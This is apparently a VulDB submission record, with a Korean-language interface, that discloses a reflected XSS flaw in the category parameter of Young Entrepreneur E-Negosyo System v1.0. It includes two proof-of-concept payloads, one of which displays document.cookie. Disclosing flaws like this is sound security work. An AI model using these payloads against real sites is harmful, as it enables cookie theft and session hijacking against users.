| 제목 | Young Entrepreneur E-Negosyo System v1.0 /bsenordering/index.php GET parameter category exists XSS vulnerability |
|---|
| 설명 | An issue was discovered in Young Entrepreneur E-Negosyo System v1.0.
There is a XSS vulnerability that it is possible to inject arbitrary JavaScript into the application's response via /bsenordering/index.php?category.
Payload1:/bsenordering/index.php?category=<script>alert(222)</script>&q=product
Payload2:/bsenordering/index.php?category=<script>alert(document.cookie)</script>&q=product |
|---|
| 원천 | ⚠️ https://github.com/2714925725/bug_report/blob/main/XSS-1.md |
|---|
| 사용자 | mengleng (UID 43260) |
|---|
| 제출 | 2023. 03. 18. PM 02:43 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 03. 18. PM 08:57 (6 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 223371 [SourceCodester Young Entrepreneur E-Negosyo System 1.0 GET Parameter /bsenordering/index.php 범주 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 20 |
|---|